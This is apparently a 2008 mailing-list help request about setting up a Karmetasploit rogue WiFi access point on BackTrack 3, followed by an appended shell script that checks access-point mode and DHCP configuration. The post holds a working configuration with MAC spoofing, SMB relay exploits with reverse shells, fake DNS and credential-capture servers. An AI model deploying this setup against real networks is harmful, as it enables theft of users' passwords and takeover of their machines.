BackTrack 3 - Karmetasploit with Alfa AWUS036H


ax0n

Sep 7, 2008, 11:56:54 PM
to HiR Information Report
I've been trying to get Karmetasploit working in the HiR lab-of-doom
with the Alfa AWUS036H. This is a very powerful USB WiFi adapter.

Here's a log of where I'm at:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Login and fetch my alfa.sh script, a derivative of the atheros-specific evilap.sh script in BT3:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Last login: Mon Sep 8 02:53:36 2008
Linux 2.6.21.5.
bt ~ # cd /pentest/wireless/karma-msf-scripts-0.01/
bt karma-msf-scripts-0.01 # wget stuff.h-i-r.net/blogstuff/alfa.sh
--03:31:17-- http://stuff.h-i-r.net/blogstuff/alfa.sh
=> `alfa.sh'
Resolving stuff.h-i-r.net... 70.85.58.244
Connecting to stuff.h-i-r.net|70.85.58.244|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 743 [application/x-sh]

100%[====================================>] 743 --.--K/s

03:31:17 (20.12 MB/s) - `alfa.sh' saved [743/743]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Contents of my script:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
bt karma-msf-scripts-0.01 # cat alfa.sh
#!/bin/sh
# Based on evilap.sh distributed with BackTrack 3 - Modified for Alfa WiFi
# (Alfa AWUS036H, RTL8187 chipset, r8187 driver, shows up as wlan0)

# Bring up the interface
echo "ifconfig up"
ifconfig wlan0 up
echo "Spoofing MAC"
macchanger -A wlan0
echo "Airmon-ng starting"
airmon-ng start wlan0
echo "Setting up the AP"
# Stop here if the driver rejects the mode change: iwconfig prints the error
# and exits non-zero, and nothing below is useful without an interface that
# is really in Master mode.
iwconfig wlan0 mode Master essid FreeFI channel 6 || { echo "mode Master failed on wlan0"; exit 1; }
ifconfig wlan0 10.0.0.1 netmask 255.255.255.0 || exit 1

# Reset/restart (just in case) dhcp server/tcpdump
killall -9 dhcpd tcpdump
echo > /var/state/dhcp/dhcpd.leases
dhcpd -cf /etc/dhcpd.conf wlan0
# Capture everything seen on the AP interface, in the background
tcpdump -ni wlan0 -s 0 -w /pentest/wireless/karma-msf-scripts-0.01/evilap_eth.cap >/dev/null 2>&1 &

# Start up metasploit
/msf3/msfconsole -r /msf3/karma.rc
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Running it. All seems well...
rausb0 is the interface I'm using to connect with my main home network.
wlan0 is the Alfa AWUS036H
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
bt karma-msf-scripts-0.01 # ./alfa.sh
ifconfig up
Spoofing MAC
Current MAC: 00:c0:ca:1b:f4:0a (Alfa, Inc.)
Faked MAC: 00:04:ea:db:fe:a5 (Hewlett-packard Company)
Airmon-ng starting


Interface Chipset Driver

wlan0 RTL8187 r8187 (monitor mode enabled)
rausb0 Ralink USB rt73

Setting up the AP
dhcpd: no process killed
tcpdump: no process killed
Internet Systems Consortium DHCP Server V3.0.6
Copyright 2004-2007 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 0 leases to leases file.
Listening on LPF/wlan0/00:04:ea:db:fe:a5/10.0.0/24
Sending on LPF/wlan0/00:04:ea:db:fe:a5/10.0.0/24
Sending on Socket/fallback/fallback-net

 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


=[ msf v3.2-release
+ -- --=[ 294 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 58 aux

resource> load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
resource> db_create /root/karma.db
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: /root/karma.db
resource> use exploit/windows/smb/smb_relay
resource> set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
resource> set LHOST 10.0.0.1
LHOST => 10.0.0.1
resource> set SRVPORT 139
SRVPORT => 139
resource> set LPORT 1390
LPORT => 1390
resource> exploit
[*] Started reverse handler
[*] Server started.
resource> use exploit/windows/smb/smb_relay
resource> set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
resource> set LHOST 10.0.0.1
LHOST => 10.0.0.1
resource> set SRVPORT 445
SRVPORT => 445
resource> set LPORT 4450
LPORT => 4450
resource> exploit
[*] Started reverse handler
[*] Server started.
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 110
SRVPORT => 110
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 995
SRVPORT => 995
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/ftp
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/imap
resource> set SSL false
SSL => false
resource> set SRVPORT 143
SRVPORT => 143
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/imap
resource> set SSL true
SSL => true
resource> set SRVPORT 993
SRVPORT => 993
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/smtp
resource> set SSL false
SSL => false
resource> set SRVPORT 25
SRVPORT => 25
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/smtp
resource> set SSL true
SSL => true
resource> set SRVPORT 465
SRVPORT => 465
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/fakedns
resource> run
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 80
SRVPORT => 80
resource> set BGIMAGE /msf3/load.gif
BGIMAGE => /msf3/load.gif
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 8080
SRVPORT => 8080
resource> set BGIMAGE /msf3/load.gif
BGIMAGE => /msf3/load.gif
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 443
SRVPORT => 443
resource> set BGIMAGE /msf3/load.gif
BGIMAGE => /msf3/load.gif
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 8443
SRVPORT => 8443
resource> set BGIMAGE /msf3/load.gif
BGIMAGE => /msf3/load.gif
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
msf auxiliary(http) >
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


From there, I get "FreeFI" showing up on my Mac under "Devices" - This
is usually where you find ad-hoc networks and the like. When I try to
join it, nothing happens. tcpdump doesn't see anything, either.
Nothing is logged to the logfile.

It feels like I'm close, but I'm at a loss. Ideas?
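The following is an added example, not code from the post, from BackTrack 3 or from the Karmetasploit scripts. It is the preflight I would bolt onto alfa.sh after the `iwconfig ... mode Master` step and before the `dhcpd` step, to learn whether those two requests actually took, since the script above issues them and carries on regardless. The functions take iwconfig and dhcpd.conf text as strings, so they run offline against the constructed samples at the bottom (the ESSID, channel, address and faked MAC are the values from the post; the iwconfig lines and the dhcpd.conf themselves are made up, not captured from the box). Function names and the samples are my own.

```shell
#!/bin/sh
# Added example, not part of the original post: offline preflight checks for a
# fake-AP bring-up like alfa.sh.  Each function takes command output as a
# string so it can be exercised against the constructed samples at the bottom;
# on a live BT3 box you would call, for instance,
#   ap_ready "$(iwconfig wlan0)" FreeFI 6 && dhcp_covers "$(cat /etc/dhcpd.conf)" 10.0.0.1

# iw_field TEXT NAME: pull NAME:value out of iwconfig output, quotes stripped.
iw_field() {
    printf '%s\n' "$1" | sed -n "s/.*$2:\"\{0,1\}\([^ \"]*\)\"\{0,1\}.*/\1/p" | head -n 1
}

# freq_to_channel GHZ: map iwconfig's "Frequency" value (e.g. 2.437) to an
# 802.11 channel.  2.4 GHz channels sit 5 MHz apart starting at 2412 (ch 1),
# channel 14 is the odd one out at 2484, and 5 GHz channels are (MHz-5000)/5.
freq_to_channel() {
    f=${1%% *}                          # drop a trailing " GHz" if present
    ghz=${f%%.*}; frac=${f#*.}
    [ "$frac" = "$f" ] && frac=0        # no fractional part at all
    [ -z "$ghz" ] && ghz=0
    frac=$(printf '%-3s' "$frac" | tr ' ' 0 | sed 's/^0*\([0-9]\)/\1/')  # "18" -> 180
    mhz=$((ghz * 1000 + frac))
    case "$mhz" in
        2484)     echo 14 ;;
        2[4-9]??) echo $(( (mhz - 2407) / 5 )) ;;
        5???)     echo $(( (mhz - 5000) / 5 )) ;;
        *)        echo 0 ;;
    esac
}

# ap_ready IWCONFIG_TEXT ESSID CHANNEL: succeed only if the card is actually in
# Master mode with ESSID on CHANNEL.  alfa.sh sends the "mode Master" request
# and never looks at whether the driver accepted it.
ap_ready() {
    mode=$(iw_field "$1" Mode)
    essid=$(iw_field "$1" ESSID)
    chan=$(freq_to_channel "$(iw_field "$1" Frequency)")
    if [ "$mode" != Master ]; then
        echo "not an AP: mode is '${mode:-unknown}'" >&2; return 1
    fi
    if [ "$essid" != "$2" ]; then
        echo "wrong ESSID: '$essid' (wanted '$2')" >&2; return 1
    fi
    if [ "$chan" -ne "$3" ]; then
        echo "wrong channel: $chan (wanted $3)" >&2; return 1
    fi
    return 0
}

# ip_to_int A.B.C.D: dotted quad to a 32-bit integer for mask arithmetic.
# The IFS change is confined to a subshell.
ip_to_int() {
    ( IFS=.; set -- $1; echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 )) )
}

# in_subnet IP NETWORK NETMASK: true when IP & NETMASK == NETWORK.
in_subnet() {
    [ $(( $(ip_to_int "$1") & $(ip_to_int "$3") )) -eq "$(ip_to_int "$2")" ]
}

# dhcp_covers DHCPD_CONF_TEXT IP: print the "subnet/netmask" declaration that
# covers IP, or fail.  dhcpd will not serve an interface whose address is not
# inside a declared subnet, and then no client ever gets a lease.
dhcp_covers() {
    printf '%s\n' "$1" |
    sed -n 's/^[[:space:]]*subnet[[:space:]]*\([0-9.]*\)[[:space:]]*netmask[[:space:]]*\([0-9.]*\).*/\1 \2/p' |
    {
        while read -r net mask; do
            in_subnet "$2" "$net" "$mask" && { echo "$net/$mask"; exit 0; }
        done
        exit 1      # this group is a subshell, so exit only ends this pipeline stage
    }
}

# Constructed samples (not captures from the box in the post): iwconfig output
# when the Master request took, iwconfig output when the card stayed in the
# monitor mode airmon-ng put it in, and a minimal dhcpd.conf for 10.0.0.0/24.
SAMPLE_MASTER='wlan0     IEEE 802.11bg  ESSID:"FreeFI"  Nickname:""
          Mode:Master  Frequency:2.437 GHz  Access Point: 00:04:EA:DB:FE:A5'
SAMPLE_MONITOR='wlan0     IEEE 802.11bg  ESSID:""  Nickname:""
          Mode:Monitor  Frequency:2.437 GHz  Access Point: Not-Associated'
SAMPLE_DHCPD='ddns-update-style none;
subnet 10.0.0.0 netmask 255.255.255.0 {
    range 10.0.0.100 10.0.0.254;
    option routers 10.0.0.1;
}'

ap_ready "$SAMPLE_MASTER"  FreeFI 6 && echo "sample 1: AP is up on channel $(freq_to_channel 2.437)"
ap_ready "$SAMPLE_MONITOR" FreeFI 6 || echo "sample 2: no AP, although alfa.sh would carry on"
dhcp_covers "$SAMPLE_DHCPD" 10.0.0.1 >/dev/null && echo "dhcpd.conf covers 10.0.0.1"
```

On the live box, `ap_ready "$(iwconfig wlan0)" FreeFI 6` right after the iwconfig call and `dhcp_covers "$(cat /etc/dhcpd.conf)" 10.0.0.1` before starting dhcpd each give a yes/no the script currently never asks for; either one failing means a client can see beacons at best and will never get an address.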